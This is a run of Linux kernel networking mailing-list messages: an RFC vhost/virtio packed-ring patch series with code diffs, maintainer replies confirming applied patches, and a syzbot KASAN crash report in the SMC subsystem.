VHOST_DMA_CLEAR_LEN; ++j; } else @@ -537,10 +538,8 @@ static void handle_tx(struct vhost_net *net) struct ubuf_info *ubuf; ubuf = nvq->ubuf_info + nvq->upend_idx; - vq->heads[nvq->upend_idx].elem.id = - cpu_to_vhost32(vq, used.elem.id); - vq->heads[nvq->upend_idx].elem.len = - VHOST_DMA_IN_PROGRESS; + vhost_set_used_len(vq, &used, VHOST_DMA_IN_PROGRESS); + vq->heads[nvq->upend_idx] = used; ubuf->callback = vhost_zerocopy_callback; ubuf->ctx = nvq->ubufs; ubuf->desc = nvq->upend_idx; diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c index 8744dae..65954d6 100644 --- a/drivers/vhost/vhost.c +++ b/drivers/vhost/vhost.c @@ -2100,11 +2100,19 @@ int vhost_get_vq_desc(struct vhost_virtqueue *vq, } EXPORT_SYMBOL_GPL(vhost_get_vq_desc); -static void vhost_set_used_len(struct vhost_virtqueue *vq, - struct vhost_used_elem *used, int len) +void vhost_set_used_len(struct vhost_virtqueue *vq, + struct vhost_used_elem *used, int len) { used->elem.len = cpu_to_vhost32(vq, len); } +EXPORT_SYMBOL_GPL(vhost_set_used_len); + +int vhost_get_used_len(struct vhost_virtqueue *vq, + struct vhost_used_elem *used) +{ + return vhost32_to_cpu(vq, used->elem.len); +} +EXPORT_SYMBOL_GPL(vhost_get_used_len); /* This is a multi-buffer version of vhost_get_desc, that works if * vq has read descriptors only. diff --git a/drivers/vhost/vhost.h b/drivers/vhost/vhost.h index 8399887..d57c875 100644 --- a/drivers/vhost/vhost.h +++ b/drivers/vhost/vhost.h @@ -198,6 +198,11 @@ int vhost_get_bufs(struct vhost_virtqueue *vq, unsigned *log_num, unsigned int quota, s16 *count); +void vhost_set_used_len(struct vhost_virtqueue *vq, + struct vhost_used_elem *used, + int len); +int vhost_get_used_len(struct vhost_virtqueue *vq, + struct vhost_used_elem *used); void vhost_discard_vq_desc(struct vhost_virtqueue *, int n); int vhost_vq_init_access(struct vhost_virtqueue *); -- 2.7.4
[RFC PATCH V2 6/8] virtio: introduce packed ring defines
Signed-off-by: Jason Wang --- include/uapi/linux/virtio_config.h | 9 + include/uapi/linux/virtio_ring.h | 13 + 2 files changed, 22 insertions(+) diff --git a/include/uapi/linux/virtio_config.h b/include/uapi/linux/virtio_config.h index 308e209..5903d51 100644 --- a/include/uapi/linux/virtio_config.h +++ b/include/uapi/linux/virtio_config.h @@ -71,4 +71,13 @@ * this is for compatibility with legacy systems. */ #define VIRTIO_F_IOMMU_PLATFORM33 + +#define VIRTIO_F_RING_PACKED 34 + +/* + * This feature indicates that all buffers are used by the device in + * the same order in which they have been made available. + */ +#define VIRTIO_F_IN_ORDER 35 + #endif /* _UAPI_LINUX_VIRTIO_CONFIG_H */ diff --git a/include/uapi/linux/virtio_ring.h b/include/uapi/linux/virtio_ring.h index 6d5d5fa..e297580 100644 --- a/include/uapi/linux/virtio_ring.h +++ b/include/uapi/linux/virtio_ring.h @@ -43,6 +43,8 @@ #define VRING_DESC_F_WRITE 2 /* This means the buffer contains a list of buffer descriptors. */ #define VRING_DESC_F_INDIRECT 4 +#define VRING_DESC_F_AVAIL 7 +#define VRING_DESC_F_USED 15 /* The Host uses this in used->flags to advise the Guest: don't kick me when * you add a buffer. It's unreliable, so it's simply an optimization. Guest @@ -62,6 +64,17 @@ * at the end of the used ring. Guest should ignore the used->flags field. */ #define VIRTIO_RING_F_EVENT_IDX29 +struct vring_desc_packed { + /* Buffer Address. */ + __virtio64 addr; + /* Buffer Length. */ + __virtio32 len; + /* Buffer ID. */ + __virtio16 id; + /* The flags depending on descriptor type. */ + __virtio16 flags; +}; + /* Virtio ring descriptors: 16 bytes. These can chain together via "next". */ struct vring_desc { /* Address (guest-physical). */ -- 2.7.4
[RFC PATCH V2 5/8] vhost: vhost_put_user() can accept metadata type
We assumes used ring update is the only user for vhost_put_user() in the past. This may not be the case for the incoming packed ring which may update the descriptor ring for used. So introduce a new type parameter. Signed-off-by: Jason Wang --- drivers/vhost/vhost.c | 14 +++--- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c index 65954d6..dcac4d4 100644 --- a/drivers/vhost/vhost.c +++ b/drivers/vhost/vhost.c @@ -847,7 +847,7 @@ static inline void __user *__vhost_get_user(struct vhost_virtqueue *vq, return __vhost_get_user_slow(vq, addr, size, type); } -#define vhost_put_user(vq, x, ptr) \ +#define vhost_put_user(vq, x, ptr, type) \ ({ \ int ret = -EFAULT; \ if (!vq->iotlb) { \ @@ -855,7 +855,7 @@ static inline void __user *__vhost_get_user(struct vhost_virtqueue *vq, } else { \ __typeof__(ptr) to = \ (__typeof__(ptr)) __vhost_get_user(vq, ptr, \ - sizeof(*ptr), VHOST_ADDR_USED); \ + sizeof(*ptr), type); \ if (to != NULL) \ ret = __put_user(x, to); \ else \ @@ -1716,7 +1716,7 @@ static int vhost_update_used_flags(struct vhost_virtqueue *vq) { void __user *used; if (vhost_put_user(vq, cpu_to_vhost16(vq, vq->used_flags), - &vq->used->flags) < 0) + &vq->used->flags, VHOST_ADDR_USED) < 0) return -EFAULT; if (unlikely(vq->log_used)) { /* Make sure the flag is seen before log. */ @@ -1735,7 +1735,7 @@ static int vhost_update_used_flags(struct vhost_virtqueue *vq) static int vhost_update_avail_event(struct vhost_virtqueue *vq, u16 avail_event) { if (vhost_put_user(vq, cpu_to_vhost16(vq, vq->avail_idx), - vhost_avail_event(vq))) + vhost_avail_event(vq), VHOST_ADDR_USED)) return -EFAULT; if (unlikely(vq->log_used)) { void __user *used; @@ -2218,12 +2218,12 @@ static int __vhost_add_used_n(struct vhost_virtqueue *vq, used = vq->used->ring + start; for (i = 0; i < count; i++) { if (unlikely(vhost_put_user(vq, heads[i].elem.id, - &used[i].id))) { + &used[i].id, VHOST_ADDR_USED))) { vq_err(vq, "Failed to write used id"); return -EFAULT; } if (unlikely(vhost_put_user(vq, heads[i].elem.len, - &used[i].len))) { + &used[i].len, VHOST_ADDR_USED))) { vq_err(vq, "Failed to write used len"); return -EFAULT; } @@ -2269,7 +2269,7 @@ int vhost_add_used_n(struct vhost_virtqueue *vq, struct vhost_used_elem *heads, /* Make sure buffer is written before we update index. */ smp_wmb(); if (vhost_put_user(vq, cpu_to_vhost16(vq, vq->last_used_idx), - &vq->used->idx)) { + &vq->used->idx, VHOST_ADDR_USED)) { vq_err(vq, "Failed to increment used idx"); return -EFAULT; } -- 2.7.4
[RFC PATCH V2 8/8] vhost: event suppression for packed ring
This patch introduces basic support for event suppression aka driver and device area. Compile tested only. Signed-off-by: Jason Wang --- drivers/vhost/vhost.c| 169 --- drivers/vhost/vhost.h| 10 ++- include/uapi/linux/virtio_ring.h | 19 + 3 files changed, 183 insertions(+), 15 deletions(-) diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c index 6177e4d..ff83a2e 100644 --- a/drivers/vhost/vhost.c +++ b/drivers/vhost/vhost.c @@ -1143,10 +1143,15 @@ static int vq_access_ok_packed(struct vhost_virtqueue *vq, unsigned int num, struct vring_used __user *used) { struct vring_desc_packed *packed = (struct vring_desc_packed *)desc; + struct vring_packed_desc_event *driver_event = + (struct vring_packed_desc_event *)avail; + struct vring_packed_desc_event *device_event = + (struct vring_packed_desc_event *)used; - /* FIXME: check device area and driver area */ return access_ok(VERIFY_READ, packed, num * sizeof(*packed)) && - access_ok(VERIFY_WRITE, packed, num * sizeof(*packed)); + access_ok(VERIFY_WRITE, packed, num * sizeof(*packed)) && + access_ok(VERIFY_READ, driver_event, sizeof(*driver_event)) && + access_ok(VERIFY_WRITE, device_event, sizeof(*device_event)); } static int vq_access_ok_split(struct vhost_virtqueue *vq, unsigned int num, @@ -1222,14 +1227,27 @@ static int iotlb_access_ok(struct vhost_virtqueue *vq, return true; } -int vq_iotlb_prefetch(struct vhost_virtqueue *vq) +int vq_iotlb_prefetch_packed(struct vhost_virtqueue *vq) +{ + int num = vq->num; + + return iotlb_access_ok(vq, VHOST_ACCESS_RO, (u64)(uintptr_t)vq->desc, + num * sizeof(*vq->desc), VHOST_ADDR_DESC) && + iotlb_access_ok(vq, VHOST_ACCESS_WO, (u64)(uintptr_t)vq->desc, + num * sizeof(*vq->desc), VHOST_ADDR_DESC) && + iotlb_access_ok(vq, VHOST_ACCESS_RO, + (u64)(uintptr_t)vq->driver_event, + sizeof(*vq->driver_event), VHOST_ADDR_AVAIL) && + iotlb_access_ok(vq, VHOST_ACCESS_WO, + (u64)(uintptr_t)vq->device_event, + sizeof(*vq->device_event), VHOST_ADDR_USED); +} + +int vq_iotlb_prefetch_split(struct vhost_virtqueue *vq) { size_t s = vhost_has_feature(vq, VIRTIO_RING_F_EVENT_IDX) ? 2 : 0; unsigned int num = vq->num; - if (!vq->iotlb) - return 1; - return iotlb_access_ok(vq, VHOST_ACCESS_RO, (u64)(uintptr_t)vq->desc, num * sizeof(*vq->desc), VHOST_ADDR_DESC) && iotlb_access_ok(vq, VHOST_ACCESS_RO, (u64)(uintptr_t)vq->avail, @@ -1241,6 +1259,17 @@ int vq_iotlb_prefetch(struct vhost_virtqueue *vq) num * sizeof(*vq->used->ring) + s, VHOST_ADDR_USED); } + +int vq_iotlb_prefetch(struct vhost_virtqueue *vq) +{ + if (!vq->iotlb) + return 1; + + if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED)) + return vq_iotlb_prefetch_packed(vq); + else + return vq_iotlb_prefetch_split(vq); +} EXPORT_SYMBOL_GPL(vq_iotlb_prefetch); /* Can we log writes? */ @@ -1756,6 +1785,29 @@ static int vhost_update_used_flags(struct vhost_virtqueue *vq) return 0; } +static int vhost_update_device_flags(struct vhost_virtqueue *vq, +__virtio16 device_flags) +{ + void __user *flags; + + if (vhost_put_user(vq, cpu_to_vhost16(vq, device_flags), + &vq->device_event->desc_event_flags, + VHOST_ADDR_DESC) < 0) + return -EFAULT; + if (unlikely(vq->log_used)) { + /* Make sure the flag is seen before log. */ + smp_wmb(); + /* Log used flag write. */ + flags = &vq->device_event->desc_event_flags; + log_write(vq->log_base, vq->log_addr + + (flags - (void __user *)vq->device_event), + sizeof(vq->used->flags)); + if (vq->log_ctx) + eventfd_signal(vq->log_ctx, 1); + } + return 0; +} + static int vhost_update_avail_event(struct vhost_virtqueue *vq, u16 avail_event) { if (vhost_put_user(vq, cpu_to_vhost16(vq, vq->avail_idx), @@ -2667,16 +2719,13 @@ int vhost_add_used_n(struct vhost_virtqueue *vq, } EXPORT_SYMBOL_GPL(vhost_add_used_n); -static bool vhost_notify(struct vhost_dev *dev, struct vhost_virtqueue *vq) +static bool vhost_notify_split(struct vhost_dev *dev, + struct vhost_virtqueue *vq) { __u16 old, new; __virtio16 event; bool v; - /* FIXME: check
[RFC PATCH V2 7/8] vhost: packed ring support
Signed-off-by: Jason Wang --- drivers/vhost/net.c | 5 +- drivers/vhost/vhost.c | 530 ++ drivers/vhost/vhost.h | 7 +- 3 files changed, 505 insertions(+), 37 deletions(-) diff --git a/drivers/vhost/net.c b/drivers/vhost/net.c index 7be8b55..84905d5 100644 --- a/drivers/vhost/net.c +++ b/drivers/vhost/net.c @@ -67,7 +67,8 @@ enum { VHOST_NET_FEATURES = VHOST_FEATURES | (1ULL << VHOST_NET_F_VIRTIO_NET_HDR) | (1ULL << VIRTIO_NET_F_MRG_RXBUF) | -(1ULL << VIRTIO_F_IOMMU_PLATFORM) +(1ULL << VIRTIO_F_IOMMU_PLATFORM) | +(1ULL << VIRTIO_F_RING_PACKED) }; enum { @@ -706,6 +707,8 @@ static void handle_rx(struct vhost_net *net) vq_log = unlikely(vhost_has_feature(vq, VHOST_F_LOG_ALL)) ? vq->log : NULL; mergeable = vhost_has_feature(vq, VIRTIO_NET_F_MRG_RXBUF); + /* FIXME: workaround for current dpdk prototype */ + mergeable = false; while ((sock_len = vhost_net_rx_peek_head_len(net, sock->sk))) { sock_len += sock_hlen; diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c index dcac4d4..6177e4d 100644 --- a/drivers/vhost/vhost.c +++ b/drivers/vhost/vhost.c @@ -324,6 +324,7 @@ static void vhost_vq_reset(struct vhost_dev *dev, vhost_reset_is_le(vq); vhost_disable_cross_endian(vq); vq->busyloop_timeout = 0; + vq->used_wrap_counter = true; vq->umem = NULL; vq->iotlb = NULL; __vhost_vq_meta_reset(vq); @@ -1136,10 +1137,22 @@ static int vhost_iotlb_miss(struct vhost_virtqueue *vq, u64 iova, int access) return 0; } -static int vq_access_ok(struct vhost_virtqueue *vq, unsigned int num, - struct vring_desc __user *desc, - struct vring_avail __user *avail, - struct vring_used __user *used) +static int vq_access_ok_packed(struct vhost_virtqueue *vq, unsigned int num, + struct vring_desc __user *desc, + struct vring_avail __user *avail, + struct vring_used __user *used) +{ + struct vring_desc_packed *packed = (struct vring_desc_packed *)desc; + + /* FIXME: check device area and driver area */ + return access_ok(VERIFY_READ, packed, num * sizeof(*packed)) && + access_ok(VERIFY_WRITE, packed, num * sizeof(*packed)); +} + +static int vq_access_ok_split(struct vhost_virtqueue *vq, unsigned int num, + struct vring_desc __user *desc, + struct vring_avail __user *avail, + struct vring_used __user *used) { size_t s = vhost_has_feature(vq, VIRTIO_RING_F_EVENT_IDX) ? 2 : 0; @@ -1151,6 +1164,17 @@ static int vq_access_ok(struct vhost_virtqueue *vq, unsigned int num, sizeof *used + num * sizeof *used->ring + s); } +static int vq_access_ok(struct vhost_virtqueue *vq, unsigned int num, + struct vring_desc __user *desc, + struct vring_avail __user *avail, + struct vring_used __user *used) +{ + if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED)) + return vq_access_ok_packed(vq, num, desc, avail, used); + else + return vq_access_ok_split(vq, num, desc, avail, used); +} + static void vhost_vq_meta_update(struct vhost_virtqueue *vq, const struct vhost_umem_node *node, int type) @@ -1763,6 +1787,9 @@ int vhost_vq_init_access(struct vhost_virtqueue *vq) vhost_init_is_le(vq); + if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED)) + return 0; + r = vhost_update_used_flags(vq); if (r) goto err; @@ -1836,7 +1863,8 @@ static int translate_desc(struct vhost_virtqueue *vq, u64 addr, u32 len, /* Each buffer in the virtqueues is actually a chain of descriptors. This * function returns the next descriptor in the chain, * or -1U if we're at the end. */ -static unsigned next_desc(struct vhost_virtqueue *vq, struct vring_desc *desc) +static unsigned next_desc_split(struct vhost_virtqueue *vq, + struct vring_desc *desc) { unsigned int next; @@ -1849,11 +1877,17 @@ static unsigned next_desc(struct vhost_virtqueue *vq, struct vring_desc *desc) return next; } -static int get_indirect(struct vhost_virtqueue *vq, - struct iovec iov[], unsigned int iov_size, - unsigned int *out_num, unsigned int *in_num, - struct vhost_log *log, unsigned int *log_num, - struct vring_desc *indirect) +static unsigned next_desc_packed(struct vhost_virtqueue *vq, +
[RFC PATCH V2 2/8] vhost: hide used ring layout from device
We used to return descriptor head by vhost_get_vq_desc() to device and pass it back to vhost_add_used() and its friends. This exposes the internal used ring layout to device which makes it hard to be extended for e.g packed ring layout. So this patch tries to hide the used ring layout by - letting vhost_get_vq_desc() return pointer to struct vring_used_elem - accepting pointer to struct vring_used_elem in vhost_add_used() and vhost_add_used_and_signal() This could help to hide used ring layout and make it easier to implement packed ring on top. Signed-off-by: Jason Wang --- drivers/vhost/net.c | 46 +- drivers/vhost/scsi.c | 62 +++ drivers/vhost/vhost.c | 52 +- drivers/vhost/vhost.h | 9 +--- drivers/vhost/vsock.c | 42 +- 5 files changed, 112 insertions(+), 99 deletions(-) diff --git a/drivers/vhost/net.c b/drivers/vhost/net.c index 57dfa63..f821fcd 100644 --- a/drivers/vhost/net.c +++ b/drivers/vhost/net.c @@ -422,22 +422,24 @@ static int vhost_net_enable_vq(struct vhost_net *n, static int vhost_net_tx_get_vq_desc(struct vhost_net *net, struct vhost_virtqueue *vq, + struct vring_used_elem *used_elem, struct iovec iov[], unsigned int iov_size, unsigned int *out_num, unsigned int *in_num) { unsigned long uninitialized_var(endtime); - int r = vhost_get_vq_desc(vq, vq->iov, ARRAY_SIZE(vq->iov), + int r = vhost_get_vq_desc(vq, used_elem, vq->iov, ARRAY_SIZE(vq->iov), out_num, in_num, NULL, NULL); - if (r == vq->num && vq->busyloop_timeout) { + if (r == -ENOSPC && vq->busyloop_timeout) { preempt_disable(); endtime = busy_clock() + vq->busyloop_timeout; while (vhost_can_busy_poll(vq->dev, endtime) && vhost_vq_avail_empty(vq->dev, vq)) cpu_relax(); preempt_enable(); - r = vhost_get_vq_desc(vq, vq->iov, ARRAY_SIZE(vq->iov), - out_num, in_num, NULL, NULL); + r = vhost_get_vq_desc(vq, used_elem, vq->iov, + ARRAY_SIZE(vq->iov), out_num, in_num, + NULL, NULL); } return r; @@ -459,7 +461,6 @@ static void handle_tx(struct vhost_net *net) struct vhost_net_virtqueue *nvq = &net->vqs[VHOST_NET_VQ_TX]; struct vhost_virtqueue *vq = &nvq->vq; unsigned out, in; - int head; struct msghdr msg = { .msg_name = NULL, .msg_namelen = 0, @@ -472,6 +473,7 @@ static void handle_tx(struct vhost_net *net) size_t hdr_size; struct socket *sock; struct vhost_net_ubuf_ref *uninitialized_var(ubufs); + struct vring_used_elem used; bool zcopy, zcopy_used; mutex_lock(&vq->mutex); @@ -494,20 +496,20 @@ static void handle_tx(struct vhost_net *net) vhost_zerocopy_signal_used(net, vq); - head = vhost_net_tx_get_vq_desc(net, vq, vq->iov, - ARRAY_SIZE(vq->iov), - &out, &in); - /* On error, stop handling until the next kick. */ - if (unlikely(head < 0)) - break; + err = vhost_net_tx_get_vq_desc(net, vq, &used, vq->iov, + ARRAY_SIZE(vq->iov), + &out, &in); /* Nothing new? Wait for eventfd to tell us they refilled. */ - if (head == vq->num) { + if (err == -ENOSPC) { if (unlikely(vhost_enable_notify(&net->dev, vq))) { vhost_disable_notify(&net->dev, vq); continue; } break; } + /* On error, stop handling until the next kick. */ + if (unlikely(err < 0)) + break; if (in) { vq_err(vq, "Unexpected descriptor format for TX: " "out %d, int %d\n", out, in); @@ -535,7 +537,8 @@ static void handle_tx(struct vhost_net *net) struct ubuf_info *ubuf; ubuf = nvq->ubuf_info + nvq->upend_idx; - vq->heads[nvq->upend_idx].id = cpu_to_vhost32(vq, head); + vq->heads[nvq->upend_idx].id = + cpu_to_vhost32(vq, used.id); vq->heads[nvq->upend_idx].len = VHOST_DMA_IN_PROGRESS;
Re: pull-request: wireless-drivers-next 2018-03-24
From: Kalle Valo Date: Sat, 24 Mar 2018 14:30:01 +0200 > here's the first pull request to net-next for 4.17. What's special here > is the addition of a new bluetooth driver, but that's been acked by > Marcel. Also we add a new include file to include/net because of that. > > Please let me know if you have any problems. Also pulled, thanks Kalle.
Re: pull-request: wireless-drivers 2018-03-24
From: Kalle Valo Date: Sat, 24 Mar 2018 13:03:13 +0200 > This is a pull request to the net tree for 4.16. I'm not planning to > send anything more in this cycle for 4.16, unless something really major > comes up. > > Please let me know if you have any problems. Pulled.
Re: [RFC PATCH net-next] tipc: tipc_disc_addr_trial_msg() can be static
From: kbuild test robot Date: Sat, 24 Mar 2018 03:47:42 +0800 > Fixes: 25b0b9c4e835 ("tipc: handle collisions of 32-bit node address hash > values") > Signed-off-by: Fengguang Wu Applied.
Re: [PATCH net v2] ipv6: the entire IPv6 header chain must fit the first fragment
From: Paolo Abeni Date: Fri, 23 Mar 2018 14:47:30 +0100 > While building ipv6 datagram we currently allow arbitrary large > extheaders, even beyond pmtu size. The syzbot has found a way > to exploit the above to trigger the following splat: ... > As stated by RFC 7112 section 5: > >When a host fragments an IPv6 datagram, it MUST include the entire >IPv6 Header Chain in the First Fragment. > > So this patch addresses the issue dropping datagrams with excessive > extheader length. It also updates the error path to report to the > calling socket nonnegative pmtu values. > > The issue apparently predates git history. > > v1 -> v2: cleanup error path, as per Eric's suggestion > > Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2") > Reported-by: syzbot+91e6f9932ff122fa4...@syzkaller.appspotmail.com > Signed-off-by: Paolo Abeni Applied and queued up for -stable.
Re: [PATCH] net/usb/qmi_wwan.c: Add USB id for lt4120 modem
From: Torsten Hilbrich Date: Fri, 23 Mar 2018 14:26:18 +0100 > This is needed to support the modem found in HP EliteBook 820 G3. > > Signed-off-by: Torsten Hilbrich This patch was corrupted by your email client, it transformed TAB characters into sequence of spaces. Please email the patch to yourself and make sure you can apply the patch you receive in that email cleanly before resubmitting it here. Thank you.
Re: [PATCH] netlink: make sure nladdr has correct size in netlink_connect()
From: Alexander Potapenko Date: Fri, 23 Mar 2018 13:49:02 +0100 > KMSAN reports use of uninitialized memory in the case when |alen| is > smaller than sizeof(struct sockaddr_nl), and therefore |nladdr| isn't > fully copied from the userspace. > > Signed-off-by: Alexander Potapenko > Fixes: 1da177e4c3f41524 ("Linux-2.6.12-rc2") > --- > v2: fixed a typo spotted by Eric Dumazet Applied and queued up for -stable, thank you.
Re: [PATCH net-next] ibmvnic: Potential NULL dereference in clean_one_tx_pool()
From: Dan Carpenter Date: Fri, 23 Mar 2018 14:36:15 +0300 > There is an && vs || typo here, which potentially leads to a NULL > dereference. > > Fixes: e9e1e97884b7 ("ibmvnic: Update TX pool cleaning routine") > Signed-off-by: Dan Carpenter Applied, thanks Dan.
Re: [PATCH net-next] cxgb4: depend on firmware event for link status
From: Ganesh Goudar Date: Fri, 23 Mar 2018 17:03:10 +0530 > Depend on the firmware sending us link status changes, > rather than assuming that the link goes down upon L1 > configuration. > > Signed-off-by: Casey Leedom > Signed-off-by: Ganesh Goudar Applied.
Re: [PATCH net-next] cxgb4: support new ISSI flash parts
From: Ganesh Goudar Date: Fri, 23 Mar 2018 17:05:49 +0530 > Add support for new 32MB and 64MB ISSI (Integrated Silicon > Solution, Inc.) FLASH parts. > > Signed-off-by: Casey Leedom > Signed-off-by: Ganesh Goudar Applied.
Re: [PATCH net-next] cxgb4: copy vlan_id in ndo_get_vf_config
From: Ganesh Goudar Date: Fri, 23 Mar 2018 15:48:46 +0530 > From: Arjun Vynipadath > > Copy vlan_id to get it displayed in vf info. > > Signed-off-by: Arjun Vynipadath > Signed-off-by: Casey Leedom > Signed-off-by: Ganesh Goudhar Applied.
Re: [PATCH v1 net] lan78xx: Set ASD in MAC_CR when EEE is enabled.
From: Raghuram Chary J Date: Fri, 23 Mar 2018 15:48:08 +0530 > Description: > EEE does not work with lan7800 when AutoSpeed is not set. > (This can happen when EEPROM is not populated or configured incorrectly) > > Root-Cause: > When EEE is enabled, the mac config register ASD is not set > i.e. in default state, causing EEE fail. > > Fix: > Set the register when eeprom is not present. > > Fixes: 55d7de9de6c3 ("Microchip's LAN7800 family USB 2/3 to 10/100/1000 > Ethernet device driver") > Signed-off-by: Raghuram Chary J > --- > v0->v1: > * Resolved the style related problems. > * Removed 1/3 patch count from Subject line. Applied, thanks.
Re: [PATCH V2 net 1/1] net/ipv4: disable SMC TCP option with SYN Cookies
From: Ursula Braun Date: Fri, 23 Mar 2018 11:05:45 +0100 > From: Hans Wippel > > Currently, the SMC experimental TCP option in a SYN packet is lost on > the server side when SYN Cookies are active. However, the corresponding > SYNACK sent back to the client contains the SMC option. This causes an > inconsistent view of the SMC capabilities on the client and server. > > This patch disables the SMC option in the SYNACK when SYN Cookies are > active to avoid this issue. > > Fixes: 60e2a7780793b ("tcp: TCP experimental option for SMC") > Signed-off-by: Hans Wippel > Signed-off-by: Ursula Braun Applied, thank you.
Re: [PATCH net-next] cxgb4: Setup FW queues before registering netdev
From: Ganesh Goudar Date: Fri, 23 Mar 2018 15:25:10 +0530 > From: Arjun Vynipadath > > When NetworkManager is enabled, there are chances that interface up > is called even before probe completes. This means we have not yet > allocated the FW sge queues, hence rest of ingress queue allocation > wont be proper. Fix this by calling setup_fw_sge_queues() before > register_netdev(). > > Fixes: 0fbc81b3ad51 ('chcr/cxgb4i/cxgbit/RDMA/cxgb4: Allocate resources > dynamically for all cxgb4 ULD's') > Signed-off-by: Arjun Vynipadath > Signed-off-by: Casey Leedom > Signed-off-by: Ganesh Goudar Applied, thank you.
Re: [PATCH net-next 0/2] net: broadcom: Adaptive interrupt coalescing
From: Florian Fainelli Date: Thu, 22 Mar 2018 18:19:31 -0700 > This patch series adds adaptive interrupt coalescing for the Gigabit > Ethernet drivers SYSTEMPORT and GENET. > > This really helps lower the interrupt count and system load, as > measured by vmstat for a Gigabit TCP RX session: Looks good to me, series applied, thanks Florian.
Re: [PATCH v3 net-next 0/2] Fixes to allow mv88e6xxx module to be reloaded
From: Andrew Lunn Date: Sun, 25 Mar 2018 23:43:13 +0200 > As reported by Uwe Kleine-König, the interrupt trigger is first > configured by DT and then reconfigured to edge. This results in a > failure on EPROBE_DEFER, or if the module is unloaded and reloaded. > > A second crash happens on module reload due to a missing call to the > common IRQ free code when using polled interrupts. > > With these fixes in place, it becomes possible to load and unload the > kernel modules a few times without it crashing. > > v2: Fix the ü in Künig a couple of times > v3: But the ü should be an ö! Series applied.
BUG: unable to handle kernel paging request in smc_ib_remember_port_attr
Hello, syzbot hit the following crash on upstream commit bcfc1f4554662d8f2429ac8bd96064a59c149754 (Sat Mar 24 16:50:12 2018 +) Merge tag 'pinctrl-v4.16-3' of git://git.kernel.org/pub/scm/linux/kernel/git/linusw/linux-pinctrl syzbot dashboard link: https://syzkaller.appspot.com/bug?extid=5cd61039dc9b8bfa6e47 So far this crash happened 5 times on upstream. C reproducer: https://syzkaller.appspot.com/x/repro.c?id=4566822275776512 syzkaller reproducer: https://syzkaller.appspot.com/x/repro.syz?id=5414431521505280 Raw console output: https://syzkaller.appspot.com/x/log.txt?id=5642358322364416 Kernel config: https://syzkaller.appspot.com/x/.config?id=-5034017172441945317 compiler: gcc (GCC) 7.1.1 20170620 IMPORTANT: if you fix the bug, please add the following tag to the commit: Reported-by: syzbot+5cd61039dc9b8bfa6...@syzkaller.appspotmail.com It will help syzbot understand when the bug is fixed. See footer for details. If you forward the report, please keep this part and the footer. BUG: unable to handle kernel paging request at fc00 IP: bytes_is_nonzero mm/kasan/kasan.c:166 [inline] IP: memory_is_nonzero mm/kasan/kasan.c:184 [inline] IP: memory_is_poisoned_n mm/kasan/kasan.c:210 [inline] IP: memory_is_poisoned mm/kasan/kasan.c:241 [inline] IP: check_memory_region_inline mm/kasan/kasan.c:257 [inline] IP: check_memory_region+0x83/0x190 mm/kasan/kasan.c:267 PGD 0 P4D 0 Oops: [#1] SMP KASAN Dumping ftrace buffer: (ftrace buffer empty) Modules linked in: CPU: 0 PID: 4138 Comm: syzkaller407129 Not tainted 4.16.0-rc6+ #1 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011 RIP: 0010:bytes_is_nonzero mm/kasan/kasan.c:166 [inline] RIP: 0010:memory_is_nonzero mm/kasan/kasan.c:184 [inline] RIP: 0010:memory_is_poisoned_n mm/kasan/kasan.c:210 [inline] RIP: 0010:memory_is_poisoned mm/kasan/kasan.c:241 [inline] RIP: 0010:check_memory_region_inline mm/kasan/kasan.c:257 [inline] RIP: 0010:check_memory_region+0x83/0x190 mm/kasan/kasan.c:267 RSP: 0018:8801b8c472e0 EFLAGS: 00010282 RAX: fc00 RBX: 0017 RCX: 85a53701 RDX: 0001 RSI: 0040 RDI: ffd8 RBP: 8801b8c472f0 R08: fc01 R09: dc03 R10: e008 R11: dc02 R12: dc03 R13: R14: R15: ffd8 FS: 00a75880() GS:8801db20() knlGS: CS: 0010 DS: ES: CR0: 80050033 CR2: fc00 CR3: 0001ceb8a001 CR4: 001606f0 DR0: DR1: DR2: DR3: DR6: fffe0ff0 DR7: 0400 Call Trace: memset+0x23/0x40 mm/kasan/kasan.c:285 memset include/linux/string.h:330 [inline] smc_ib_remember_port_attr+0x91/0x340 net/smc/smc_ib.c:419 smc_pnet_add+0xb43/0xde0 net/smc/smc_pnet.c:354 genl_family_rcv_msg+0x7b7/0xfb0 net/netlink/genetlink.c:599 genl_rcv_msg+0xb2/0x140 net/netlink/genetlink.c:624 netlink_rcv_skb+0x14b/0x380 net/netlink/af_netlink.c:2444 genl_rcv+0x28/0x40 net/netlink/genetlink.c:635 netlink_unicast_kernel net/netlink/af_netlink.c:1308 [inline] netlink_unicast+0x4c4/0x6b0 net/netlink/af_netlink.c:1334 netlink_sendmsg+0xa4a/0xe60 net/netlink/af_netlink.c:1897 sock_sendmsg_nosec net/socket.c:630 [inline] sock_sendmsg+0xca/0x110 net/socket.c:640 ___sys_sendmsg+0x767/0x8b0 net/socket.c:2046 __sys_sendmsg+0xe5/0x210 net/socket.c:2080 SYSC_sendmsg net/socket.c:2091 [inline] SyS_sendmsg+0x2d/0x50 net/socket.c:2087 do_syscall_64+0x281/0x940 arch/x86/entry/common.c:287 entry_SYSCALL_64_after_hwframe+0x42/0xb7 RIP: 0033:0x43fda9 RSP: 002b:7ffd35aa5268 EFLAGS: 0213 ORIG_RAX: 002e RAX: ffda RBX: 004002c8 RCX: 0043fda9 RDX: 00040004 RSI: 20a87fc8 RDI: 0003 RBP: 006ca018 R08: 004002c8 R09: 004002c8 R10: 004002c8 R11: 0213 R12: 004016d0 R13: 00401760 R14: R15: Code: fa 10 7f 3d 4d 85 d2 74 33 41 80 39 00 75 21 48 b8 01 00 00 00 00 fc ff df 4d 01 d1 49 01 c0 4d 39 c1 4c 89 c0 74 15 49 83 c0 01 <80> 38 00 74 ef 48 85 c0 49 89 c0 0f 85 89 00 00 00 5b 41 5c 5d RIP: bytes_is_nonzero mm/kasan/kasan.c:166 [inline] RSP: 8801b8c472e0 RIP: memory_is_nonzero mm/kasan/kasan.c:184 [inline] RSP: 8801b8c472e0 RIP: memory_is_poisoned_n mm/kasan/kasan.c:210 [inline] RSP: 8801b8c472e0 RIP: memory_is_poisoned 